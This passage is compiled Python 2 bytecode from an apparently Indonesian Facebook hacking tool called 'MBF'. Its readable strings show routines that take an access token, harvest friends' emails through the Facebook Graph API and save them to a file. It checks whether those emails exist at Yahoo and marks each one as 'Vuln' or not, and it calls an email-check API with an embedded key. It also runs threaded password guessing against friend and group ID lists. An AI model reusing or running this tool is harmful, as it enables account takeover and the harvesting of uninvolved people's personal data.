\x13\x00\x83\x00\x00}\x0b\x00Wn{\x00\x01\x01\x01d\x1d\x00}\x0c\x00d\x1e\x00t\x1a\x00|\x06\x00d\x17\x00\x19\x83\x01\x00\x18}\r\x00|\r\x00d\x1f\x00\x14}\x0e\x00d \x00t\x1a\x00|\x0c\x00\x83\x01\x00\x18}\x0f\x00|\x0f\x00d\x1f\x00\x14}\x10\x00d!\x00|\x06\x00d"\x00\x19\x17GHd#\x00|\x06\x00d\x17\x00\x19\x17|\x0e\x00\x17d$\x00\x17|\x0c\x00\x17|\x10\x00\x17GHd\x08\x00d\x0c\x00\x14GHw\xcc\x00n\x01\x00Xd%\x00|\x0b\x00k\x06\x00rU\x02d&\x00}\x0c\x00n\x06\x00d\x1d\x00}\x0c\x00d\x1e\x00t\x1a\x00|\x06\x00d\x17\x00\x19\x83\x01\x00\x18}\r\x00|\r\x00d\x1f\x00\x14}\x0e\x00d \x00t\x1a\x00|\x0c\x00\x83\x01\x00\x18}\x0f\x00|\x0f\x00d\x1f\x00\x14}\x10\x00d!\x00|\x06\x00d"\x00\x19\x17GHd#\x00|\x06\x00d\x17\x00\x19\x17|\x0e\x00\x17d$\x00\x17|\x0c\x00\x17|\x10\x00\x17GHd\x08\x00d\x0c\x00\x14GHn\xc6\x00d\'\x00|\x08\x00k\x06\x00r\x8f\x03d(\x00|\x06\x00d\x17\x00\x19\x17d)\x00\x17}\x11\x00t\n\x00j\x0b\x00t\x0c\x00j\r\x00|\x11\x00\x83\x01\x00j\x0e\x00\x83\x01\x00}\x12\x00|\x12\x00d*\x00\x19d\x01\x00k\x02\x00r\x1b\x03d&\x00}\x0c\x00n\x06\x00d\x1d\x00}\x0c\x00d\x1e\x00t\x1a\x00|\x06\x00d\x17\x00\x19\x83\x01\x00\x18}\r\x00|\r\x00d\x1f\x00\x14}\x0e\x00d 
\x00t\x1a\x00|\x0c\x00\x83\x01\x00\x18}\x0f\x00|\x0f\x00d\x1f\x00\x14}\x10\x00d!\x00|\x06\x00d"\x00\x19\x17GHd#\x00|\x06\x00d\x17\x00\x19\x17|\x0e\x00\x17d$\x00\x17|\x0c\x00\x17|\x10\x00\x17GHd\x08\x00d\x0c\x00\x14GHn\x00\x00Wq\xcc\x00\x04t\x1b\x00k\n\x00r\xa3\x03\x01\x01\x01q\xcc\x00Xq\xcc\x00Wt\x08\x00d\x0f\x00\x83\x01\x00}\x13\x00t\t\x00\x83\x00\x00\x01d\x00\x00S(+\x00\x00\x00Ni\x00\x00\x00\x00s\t\x00\x00\x00login.txtR\x18\x00\x00\x00s%\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTunggu sebentar ...i\x01\x00\x00\x00R\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_s$\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTunggu sebentar...i\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors\'\x00\x00\x00\x1b[1;91m[!] 
\x1b[1;92mPerlu Ambil Id dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s\x1a\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mMulai...Rt\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/R\x1a\x00\x00\x00s\x0e\x00\x00\x00?access_token=s\x03\x00\x00\x00@.*R;\x00\x00\x00s\t\x00\x00\x00yahoo.coms_\x00\x00\x00https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.comR:\x00\x00\x00R\xcd\x00\x00\x00s$\x00\x00\x00"messages.ERROR_INVALID_USERNAME">.*s\x13\x00\x00\x00\x1b[31m[ Tidak Vuln ]i\x1e\x00\x00\x00Rf\x00\x00\x00i\x18\x00\x00\x00s\x15\x00\x00\x00\x1b[1;92mNama \x1b[1;97m: R\x19\x00\x00\x00s\x07\x00\x00\x00\x1b[1;97ms\x05\x00\x00\x00<====s"\x00\x00\x00"messages.ERROR_INVALID_USERNAME">s\r\x00\x00\x00\x1b[32m[ Vuln ]t\x07\x00\x00\x00hotmailsP\x00\x00\x00http://apilayer.net/api/check?access_key=7a58ece2d10e54d09e93b71379677dbb&email=s\x10\x00\x00\x00&smtp=1&format=1t\n\x00\x00\x00smtp_check(\x1c\x00\x00\x00t\x01\x00\x00\x00ot\x01\x00\x00\x00hR\x1b\x00\x00\x00R\x1c\x00\x00\x00R7\x00\x00\x00R\x08\x00\x00\x00R\x15\x00\x00\x00R(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R!\x00\x00\x00R#\x00\x00\x00R]\x00\x00\x00t\x07\x00\x00\x00compileR3\x00\x00\x00t\x05\x00\x00\x00groupR@\x00\x00\x00RU\x00\x00\x00RV\x00\x00\x00RW\x00\x00\x00RA\x00\x00\x00RC\x00\x00\x00R\x0c\x00\x00\x00R\'\x00\x00\x00(\x14\x00\x00\x00R)\x00\x00\x00R\xa6\x00\x00\x00t\x02\x00\x00\x00urR*\x00\x00\x00Rd\x00\x00\x00R\r\x00\x00\x00R\xc4\x00\x00\x00t\x05\x00\x00\x00kuncit\x04\x00\x00\x00carit\x01\x00\x00\x00jt\x03\x00\x00\x00Zent\x02\x00\x00\x00cdt\x04\x00\x00\x00vulnt\x04\x00\x00\x00leant\x03\x00\x00\x00emlt\x04\x00\x00\x00lonet\x05\x00\x00\x00namelRH\x00\x00\x00R\x08\x01\x00\x00t\t\x00\x00\x00inputanya(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R4\x00\x00\x00%\x04\x00\x00s\x96\x00\x00\x00\x00\x02\x06\x01\x06\x01\x03\x01\x15\x01\x05\x01\n\x01\r\x12\x05\x01\t\x01\t\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01\x0b\x01\n\x01\x1b\x01\x05\x01\t\x01\x11\x01\n\x01\r\x01\x1f\x01\x12\x01\x03\x01\x0f\x01\x19\x01\x0c\x01\r\x01\x0c\x01\x10\x01\x0e\x01\x12\x01\x0f\x01\x03\x01\x19\x01\x03\x01\x06\x01\x14\x01\n\x01\x10\x01\n\x01\r\x01\x1d\x01\t\x01\x07\x01\x0c\x01\t\x02\x06\x01\x14\x01\n\x01\x10\x01\n\x01\r\x01\x1d\x01\x0c\x01\x0c\x01\x12\x01\x1b\x01\x10\x01\t\x02\x06\x01\x14\x01\n\x01\x10\x01\n\x01\r\x01\x1d\x01\x0c\x02\x04\x01\r\x01\x08\x01\x0c\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00sF\x02\x00\x00y(\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00d\x03\x00GHt\x02\x00d\x04\x00\x83\x01\x00\x01Wn7\x00\x04t\x03\x00k\n\x00ra\x00\x01\x01\x01d\x05\x00d\x06\x00\x14GHd\x07\x00GHd\x08\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x01\x00t\x05\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x06\x00j\x07\x00d\n\x00\x83\x01\x00\x01Wn\x11\x00\x04t\x08\x00k\n\x00r\x86\x00\x01\x01\x01n\x01\x00Xt\x06\x00j\t\x00d\x0b\x00\x83\x01\x00\x01d\x0c\x00GHd\r\x00d\x0e\x00\x14GHd\x0f\x00GHt\x02\x00d\x04\x00\x83\x01\x00\x01d\x10\x00GHd\r\x00d\x06\x00\x14GHy\xf5\x00t\n\x00j\x0b\x00d\x11\x00|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0c\x00j\r\x00|\x02\x00j\x0e\x00\x83\x01\x00}\x03\x00t\x00\x00d\x12\x00d\x13\x00\x83\x02\x00}\x04\x00x\x93\x00|\x03\x00d\x14\x00\x19D]\x87\x00}\x05\x00t\n\x00j\x0b\x00d\x15\x00|\x05\x00d\x16\x00\x19\x17d\x17\x00\x17|\x00\x00\x17\x83\x01\x00}\x06\x00t\x0c\x00j\r\x00|\x06\x00j\x0e\x00\x83\x01\x00}\x07\x00y<\x00|\x04\x00j\x0f\x00|\x07\x00d\n\x00\x19d\x1
8\x00\x17\x83\x01\x00\x01d\x19\x00|\x07\x00d\x1a\x00\x19\x17GHd\x1b\x00|\x07\x00d\n\x00\x19\x17GHd\r\x00d\x06\x00\x14GHWq\x01\x01\x04t\x10\x00k\n\x00r\x87\x01\x01\x01\x01q\x01\x01Xq\x01\x01W|\x04\x00j\x11\x00\x83\x00\x00\x01d\x1c\x00GHd\x1d\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x08\x00t\x05\x00\x83\x00\x00\x01Wn\x8b\x00\x04t\x12\x00k\n\x00r\xdf\x01\x01\x01\x01d\x1e\x00GHt\x04\x00d\t\x00\x83\x01\x00}\t\x00t\x05\x00\x83\x00\x00\x01nc\x00\x04t\x10\x00k\n\x00r\x07\x02\x01\x01\x01d\x1f\x00GHt\x04\x00d\t\x00\x83\x01\x00}\n\x00t\x05\x00\x83\x00\x00\x01n;\x00\x04t\n\x00j\x13\x00j\x14\x00t\n\x00j\x13\x00j\x15\x00f\x02\x00k\n\x00rA\x02\x01\x01\x01d \x00GHt\x04\x00d\t\x00\x83\x01\x00}\x0b\x00t\x05\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(!\x00\x00\x00Ns\t\x00\x00\x00login.txtR\x18\x00\x00\x00s%\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTunggu sebentar ...i\x01\x00\x00\x00i\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors\'\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mPerlu Ambil Id dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]R;\x00\x00\x00R\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_s0\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mMengambil semua email teman...s\x1a\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mMulai...s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s\x0e\x00\x00\x00email/mail.txtRM\x00\x00\x00Rt\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/R\x1a\x00\x00\x00s\x0e\x00\x00\x00?access_token=s\x01\x00\x00\x00\ns\x1d\x00\x00\x00\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m R\x19\x00\x00\x00s\x1c\x00\x00\x00\x1b[1;92mMail\x1b[1;91m : \x1b[1;97ms\x19\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSelesais4\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTersimpan \x1b[1;97m: sampah/mail.txts\x13\x00\x00\x00\x1b[1;91m[!] Terhentis \x00\x00\x00\x1b[1;91m[X] Gagal mengambil Emails\x18\x00\x00\x00\x1b[1;91m[!] 
Koneksi Error(\x16\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R7\x00\x00\x00R(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00R\x08\x00\x00\x00R\xc0\x00\x00\x00R\xc1\x00\x00\x00R\x15\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00RP\x00\x00\x00R\'\x00\x00\x00R\x86\x00\x00\x00R{\x00\x00\x00R\x87\x00\x00\x00R\x88\x00\x00\x00R\xc2\x00\x00\x00(\x0c\x00\x00\x00R)\x00\x00\x00R\xa6\x00\x00\x00R\x18\x00\x00\x00R*\x00\x00\x00R\xc3\x00\x00\x00Rd\x00\x00\x00R\r\x00\x00\x00R\xc4\x00\x00\x00t\r\x00\x00\x00inputanyamailt\x0e\x00\x00\x00inputanyamail1t\x0e\x00\x00\x00inputanyamail2t\x0e\x00\x00\x00inputanyamail3(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R0\x00\x00\x00\x87\x04\x00\x00sh\x00\x00\x00\x00\x01\x03\x01\x15\x01\x05\x01\x0e\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x02\r\x12\x05\x01\t\x01\x05\x01\n\x01\x05\x01\t\x02\x03\x01\x13\x01\x12\x02\x0f\x02\x11\x01\x1f\x01\x12\x02\x03\x01\x15\x01\r\x01\r\x01\r\x01\r\x01\x08\x01\n\x02\x05\x01\x05\x01\x0c\x01\x0b\x02\r\x01\x05\x01\x0c\x01\n\x01\r\x01\x05\x01\x0c\x01\n\x01\x1f\x01\x05\x01\x0c\x01c\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xe5\x00\x00\x00d\x01\x00}\x00\x00t\x00\x00j\x01\x00d\x02\x00\x83\x01\x00\x01d\x03\x00GHd\x04\x00d\x05\x00\x14GHt\x02\x00d\x06\x00\x83\x01\x00a\x03\x00yz\x00t\x04\x00|\x00\x00d\x07\x00\x83\x02\x00a\x05\x00g\x00\x00}\x01\x00xC\x00t\x06\x00d\x08\x00\x83\x01\x00D]5\x00}\x02\x00t\x07\x00j\x08\x00d\t\x00t\t\x00d\n\x00d\x10\x00\x83\x00\x02}\x03\x00|\x03\x00j\n\x00\x83\x00\x00\x01|\x01\x00j\x0b\x00|\x03\x00\x83\x01\x00\x01qR\x00Wx\x18\x00|\x01\x00D]\x10\x00}\x03\x00|\x03\x00j\x0c\x00\x83\x00\x00\x01q\x92\x00WWn7\x00\x04t\r\x00k\n\x00r\xe0\x00\x01\x01\x01d\x0b\x00d\x0c\x00\x14GHd\r\x00GHd\x0e\x00GHt\x0e\x00d\x0f\x00\x83\x01\x00}\x04\x00t\x0f\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x11\x00\x00\x00Ns\x0b\x00\x00\x00IDgroup.txtR\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_s$\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;97m: R\x18\x00\x00\x00i(\x00\x00\x00R\xd8\x00\x00\x00t\x04\x00\x00\x00argsi\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors1\x00\x00\x00\x1b[1;91m[!] 
\x1b[1;92mPerlu Ambil Id dari grup dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m](\x00\x00\x00\x00(\x10\x00\x00\x00R\x08\x00\x00\x00R\x15\x00\x00\x00R\x10\x00\x00\x00R\xb9\x00\x00\x00R\x1b\x00\x00\x00R\xb1\x00\x00\x00t\x05\x00\x00\x00rangeRn\x00\x00\x00Ro\x00\x00\x00R\xbb\x00\x00\x00t\x05\x00\x00\x00startR#\x00\x00\x00RQ\x00\x00\x00R(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00(\x05\x00\x00\x00t\x02\x00\x00\x00Idt\x07\x00\x00\x00threadsR\r\x00\x00\x00R\x12\x00\x00\x00R\xa6\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R\x81\x00\x00\x00\xd6\x04\x00\x00s(\x00\x00\x00\x00\x01\x06\x02\r\x12\x05\x01\t\x01\x0c\x01\x03\x02\x0f\x01\x06\x01\x13\x01\x18\x01\n\x01\x11\x01\r\x01\x12\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01c\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xe5\x00\x00\x00d\x01\x00}\x00\x00t\x00\x00j\x01\x00d\x02\x00\x83\x01\x00\x01d\x03\x00GHd\x04\x00d\x05\x00\x14GHt\x02\x00d\x06\x00\x83\x01\x00a\x03\x00yz\x00t\x04\x00|\x00\x00d\x07\x00\x83\x02\x00a\x05\x00g\x00\x00}\x01\x00xC\x00t\x06\x00d\x08\x00\x83\x01\x00D]5\x00}\x02\x00t\x07\x00j\x08\x00d\t\x00t\t\x00d\n\x00d\x10\x00\x83\x00\x02}\x03\x00|\x03\x00j\n\x00\x83\x00\x00\x01|\x01\x00j\x0b\x00|\x03\x00\x83\x01\x00\x01qR\x00Wx\x18\x00|\x01\x00D]\x10\x00}\x03\x00|\x03\x00j\x0c\x00\x83\x00\x00\x01q\x92\x00WWn7\x00\x04t\r\x00k\n\x00r\xe0\x00\x01\x01\x01d\x0b\x00d\x0c\x00\x14GHd\r\x00GHd\x0e\x00GHt\x0e\x00d\x0f\x00\x83\x01\x00}\x04\x00t\x0f\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x11\x00\x00\x00Ns\t\x00\x00\x00teman.txtR\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_s$\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;97m: R\x18\x00\x00\x00i(\x00\x00\x00R\xd8\x00\x00\x00R-\x01\x00\x00i\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors\'\x00\x00\x00\x1b[1;91m[!] 
\x1b[1;92mPerlu Ambil Id dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m](\x00\x00\x00\x00(\x10\x00\x00\x00R\x08\x00\x00\x00R\x15\x00\x00\x00R\x10\x00\x00\x00R\xb4\x00\x00\x00R\x1b\x00\x00\x00R\xb1\x00\x00\x00R.\x01\x00\x00Rn\x00\x00\x00Ro\x00\x00\x00R\xb8\x00\x00\x00R/\x01\x00\x00R#\x00\x00\x00RQ\x00\x00\x00R(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00(\x05\x00\x00\x00R0\x01\x00\x00R1\x01\x00\x00R\r\x00\x00\x00R\x12\x00\x00\x00R\xa6\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R\x80\x00\x00\x00\xff\x04\x00\x00s(\x00\x00\x00\x00\x01\x06\x02\r\x12\x05\x01\t\x01\x0c\x01\x03\x02\x0f\x01\x06\x01\x13\x01\x18\x01\n\x01\x11\x01\r\x01\x12\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01R\\\x00\x00\x00s1\x00\x00\x00\n\x1b[32m[\x1b[31m+\x1b[32m] \x1b[1;92mBerhasil \x1b[1;97m--> s\x17\x00\x00\x00\x1b[32mUsername \x1b[1;97m: s0\x00\x00\x00\x1b[33m[\x1b[31m+\x1b[33m] \x1b[1;93mCheckpoint \x1b[1;97m--> s\x19\x00\x00\x00\x1b[1;93mUsername \x1b[1;97m: s\x1f\x00\x00\x00\x1b[31m[+] Gagal \x1b[1;97m--> (\x02\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16(`\x00\x00\x00t\x08\x00\x00\x00platformR\x08\x00\x00\x00Rn\x00\x00\x00R\x9e\x00\x00\x00Ry\x00\x00\x00R\x1f\x00\x00\x00R\t\x00\x00\x00t\t\x00\x00\x00cookielibRv\x00\x00\x00t\x04\x00\x00\x00timeR\x00\x00\x00\x00R7\x00\x00\x00t\x08\x00\x00\x00datetimeR\x01\x00\x00\x00R]\x00\x00\x00R\x1d\x00\x00\x00t\x0b\x00\x00\x00ImportErrorR\x15\x00\x00\x00R\n\x00\x00\x00t\t\x00\x00\x00mechanizeR"\x00\x00\x00RE\x00\x00\x00RN\x00\x00\x00t\n\x00\x00\x00fid_bgroupt\n\x00\x00\x00jumlahdataR\xc9\x00\x00\x00t\x06\x00\x00\x00reloadt\x12\x00\x00\x00setdefaultencodingt\x07\x00\x00\x00BrowserR@\x00\x00\x00t\x11\x00\x00\x00set_handle_robotst\x05\x00\x00\x00Falset\x10\x00\x00\x00set_handle_equivRU\x00\x00\x00t\x12\x00\x00\x00set_handle_referert\r\x00\x00\x00set_cookiejart\x0c\x00\x00\x00LWPCookieJart\x13\x00\x00\x00set_handle_redirectt\x12\x00\x00\x00set_handle_refresht\x05\x00\x00\x00_httpt\x14\x00\x00\x00HTTPRefreshProcessort\n\x00\x00\x00addheaderst\x0c\x00\x00\x00progress.barR\x05\x00\x00\x00t\x03\x00\x00\x00barR.\x01\x00\x00Rd\x00\x00\x00Rk\x00\x00\x00t\x06\x00\x00\x00finishR\x10\x00\x00\x00R\x14\x00\x00\x00R\x16\x00\x00\x00R\x17\x00\x00\x00R,\x00\x00\x00R&\x00\x00\x00R9\x00\x00\x00RL\x00\x00\x00RT\x00\x00\x00R?\x00\x00\x00Re\x00\x00\x00Rl\x00\x00\x00R.\x00\x00\x00Ro\x00\x00\x00Rm\x00\x00\x00R/\x00\x00\x00R\x7f\x00\x00\x00R\x1e\x00\x00\x00R)\x00\x00\x00R-\x00\x00\x00R\xb8\x00\x00\x00R\xbb\x00\x00\x00R6\x00\x00\x00R1\x00\x00\x00R2\x00\x00\x00R3\x00\x00\x00Ra\x00\x00\x00R\xbc\x00\x00\x00R\xda\x00\x00\x00R\xe4\x00\x00\x00R\xf3\x00\x00\x00R\xbd\x00\x00\x00R\x07\x01\x00\x00R5\x00\x00\x00R4\x00\x00\x00R0\x00\x00\x00R\x81\x00\x00\x00R\x80\x00\x00\x00R\xa5\x00\x00\x00R\x0c\x00\x00\x00R\xae\x00\x00\x00R\x0f\x00\x00\x00R\xaf\x00\x00\x00t\x01\x00\x00\x00cR\xb0\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\xc0\x00\x00\x00\x0c\x01$\x01$\x01\x18\x01\x10\x01\x10\x01\x0c\x01\x03\x01\x10\x01\r\x01\r\x01\x05\x01\x0e\x02\x03\x01\x10\x01\r\x01\r\x01\x05\x01\x0e\x02\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\n\x01\r\x01\x0c\x01\r\x01\r\x01\r\x01\x13\x01\r\x01\x1c\x01\x0c\x02\x03\x01\x14\x01\r\x01\r\x01\x05\x01\x0e\x02\x12